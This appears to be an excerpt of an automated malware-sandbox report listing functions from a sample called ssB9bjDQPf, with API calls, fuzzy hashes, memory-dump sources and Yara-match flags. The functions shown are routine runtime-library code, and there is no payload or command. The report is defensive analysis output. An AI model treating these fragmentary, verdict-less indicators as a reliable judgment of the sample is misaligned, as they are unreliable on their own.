                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                    • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                    APIs
                                                    • _free.LIBCMT ref: 02522061
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 0252206D
                                                    • _free.LIBCMT ref: 02522078
                                                    • _free.LIBCMT ref: 02522083
                                                    • _free.LIBCMT ref: 0252208E
                                                    • _free.LIBCMT ref: 02522099
                                                    • _free.LIBCMT ref: 025220A4
                                                    • _free.LIBCMT ref: 025220AF
                                                    • _free.LIBCMT ref: 025220BA
                                                    • _free.LIBCMT ref: 025220C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                    • Instruction ID: 61115e92762f8909a94688a17a4bd7bfc5cc7cbb3a00f193923536d4be60acf5
                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                    • Instruction Fuzzy Hash: 7F11A47620012DBFCB41EF54C841CD93BAAFF49350B0180A1BA088F2A1DB75EE659F84
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __cftoe
                                                    • String ID: F(@$F(@
                                                    • API String ID: 4189289331-2038261262
                                                    • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                    • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                    • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                    • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                    APIs
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: DecodePointer
                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                    • API String ID: 3527080286-3064271455
                                                    • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                    • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                    • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                    • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                    • Instruction ID: b9a4e3fec19be10499350421c4e009bec54d613f88aae83d4994120e77c27916
                                                    • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                    • Instruction Fuzzy Hash: F5C1E170E04269BBDB12DFA8C845BADBFB5BF4A300F1440D9E814A72D1C7389949CB69
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                    • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                    • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: fB$csm
                                                    • API String ID: 1170836740-1586063737
                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                    • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                    • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                    APIs
                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                    • PMDtoOffset.LIBCMT ref: 00428D4F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: FindInstanceTargetType$Offset
                                                    • String ID: Bad dynamic_cast!
                                                    • API String ID: 1467055271-2956939130
                                                    • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                    • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                    • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                    • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                    APIs
                                                    • atomic_compare_exchange.LIBCONCRT ref: 0250C6DC
                                                    • atomic_compare_exchange.LIBCONCRT ref: 0250C700
                                                    • std::_Cnd_initX.LIBCPMT ref: 0250C711
                                                    • std::_Cnd_initX.LIBCPMT ref: 0250C71F
                                                      • Part of subcall function 024F1370: __Mtx_unlock.LIBCPMT ref: 024F1377
                                                    • std::_Cnd_initX.LIBCPMT ref: 0250C72F
                                                      • Part of subcall function 0250C3EF: __Cnd_broadcast.LIBCPMT ref: 0250C3F6
                                                    • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0250C73D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                    • String ID: t#D
                                                    • API String ID: 4258476935-1671555958
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                    • __alloca_probe_16.LIBCMT ref: 004321C6
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                    • __alloca_probe_16.LIBCMT ref: 004322AB
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                    • __freea.LIBCMT ref: 0043231B
                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                    • __freea.LIBCMT ref: 00432324
                                                    • __freea.LIBCMT ref: 00432349
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 3864826663-0
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • _free.LIBCMT ref: 02521444
                                                    • _free.LIBCMT ref: 0252145D
                                                    • _free.LIBCMT ref: 0252148F
                                                    • _free.LIBCMT ref: 02521498
                                                    • _free.LIBCMT ref: 025214A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorLast
                                                    • String ID: C
                                                    • API String ID: 3291180501-1037565863
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                    • __fassign.LIBCMT ref: 00433940
                                                    • __fassign.LIBCMT ref: 0043395B
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                    • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                    • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    • API String ID: 1324828854-0
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(?,0251C4A4,E0830C40,?,?,?,?,?,?,0252425F,024FE03C,0251C4A4,?,0251C4A4,0251C4A4,024FE03C), ref: 02523B2C
                                                    • __fassign.LIBCMT ref: 02523BA7
                                                    • __fassign.LIBCMT ref: 02523BC2
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0251C4A4,00000001,?,00000005,00000000,00000000), ref: 02523BE8
                                                    • WriteFile.KERNEL32(?,?,00000000,0252425F,00000000,?,?,?,?,?,?,?,?,?,0252425F,024FE03C), ref: 02523C07
                                                    • WriteFile.KERNEL32(?,024FE03C,00000001,0252425F,00000000,?,?,?,?,?,?,?,?,?,0252425F,024FE03C), ref: 02523C40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    • API String ID: 1324828854-0
                                                    APIs
                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02514ACD
                                                      • Part of subcall function 02514D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02514800), ref: 02514DAC
                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02514AE2
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02514AF1
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02514AFF
                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02514B75
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02514BB5
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02514BC3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                    • String ID:
                                                    • API String ID: 3151764488-0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    APIs
                                                      • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                    • _free.LIBCMT ref: 0043A3D1
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 0043A3DC
                                                    • _free.LIBCMT ref: 0043A3E7
                                                    • _free.LIBCMT ref: 0043A43B
                                                    • _free.LIBCMT ref: 0043A446
                                                    • _free.LIBCMT ref: 0043A451
                                                    • _free.LIBCMT ref: 0043A45C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    APIs
                                                      • Part of subcall function 0252A331: _free.LIBCMT ref: 0252A35A
                                                    • _free.LIBCMT ref: 0252A638
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 0252A643
                                                    • _free.LIBCMT ref: 0252A64E
                                                    • _free.LIBCMT ref: 0252A6A2
                                                    • _free.LIBCMT ref: 0252A6AD
                                                    • _free.LIBCMT ref: 0252A6B8
                                                    • _free.LIBCMT ref: 0252A6C3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    APIs
                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                    • String ID:
                                                    • API String ID: 4227777306-0
                                                    APIs
                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 02502667
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 0250266D
                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 0250269A
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 025026A4
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 025026B6
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025026CC
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025026DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                    • String ID:
                                                    • API String ID: 4227777306-0
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0250670B), ref: 025024B6
                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 025024C4
                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 025024D2
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0250670B), ref: 02502500
                                                    • GetProcAddress.KERNEL32(00000000), ref: 02502507
                                                    • GetLastError.KERNEL32(?,?,?,0250670B), ref: 02502522
                                                    • GetLastError.KERNEL32(?,?,?,0250670B), ref: 0250252E
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02502544
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02502552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                    • String ID: kernel32.dll
                                                    • API String ID: 4179531150-1793498882
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw
                                                    • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                    • API String ID: 2005118841-3619870194
                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                    • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                    • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                    • _free.LIBCMT ref: 004311DD
                                                    • _free.LIBCMT ref: 004311F6
                                                    • _free.LIBCMT ref: 00431228
                                                    • _free.LIBCMT ref: 00431231
                                                    • _free.LIBCMT ref: 0043123D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorLast$_memcmp
                                                    • String ID:
                                                    • API String ID: 4275183328-0
                                                    • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                    • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                    • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                    • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,025225EC,00000001,00000001,?), ref: 025223F5
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,025225EC,00000001,00000001,?,?,?,?), ref: 0252247B
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02522575
                                                    • __freea.LIBCMT ref: 02522582
                                                      • Part of subcall function 0252390E: RtlAllocateHeap.NTDLL(00000000,024FDAD7,00000000), ref: 02523940
                                                    • __freea.LIBCMT ref: 0252258B
                                                    • __freea.LIBCMT ref: 025225B0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                    • Instruction ID: 8ce27cbd4ad7c23c107e5cdbd417471e04d5ee5eeee84018339d24b65a7877db
                                                    • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                    • Instruction Fuzzy Hash: B551F576700227ABDB258F64CC60EBE7BAAFB46714F558628FC04DA1D0DB74DC48CA58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __cftoe
                                                    • String ID:
                                                    • API String ID: 4189289331-0
                                                    • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                    • Instruction ID: 92aa710be37d0308c156f40d4373e570a2f8b2e2dbc5d67099d0d4df7ed2cf09
                                                    • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                    • Instruction Fuzzy Hash: 5251F832900206ABFF249F68CC43F6E7BA9BF89334F114259EC15921C1EB75D901CA6C
                                                    APIs
                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02513051
                                                      • Part of subcall function 02508AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02508ABD
                                                    • SafeSQueue.LIBCONCRT ref: 0251306A
                                                    • Concurrency::location::_Assign.LIBCMT ref: 0251312A
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0251314B
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02513159
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                    • String ID:
                                                    • API String ID: 3496964030-0
                                                    • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                    • Instruction ID: f0d6a5a0da6935a98748f293538aa7d59306201a0d0b49b80d0a754c992005c7
                                                    • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                    • Instruction Fuzzy Hash: DF31D531A00612AFDB25EF65C894B7ABBF1FF84720F144599D80A9B291DB70E945CFC4
                                                    APIs
                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 02518F77
                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 02518F90
                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 02518F97
                                                    • PMDtoOffset.LIBCMT ref: 02518FB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
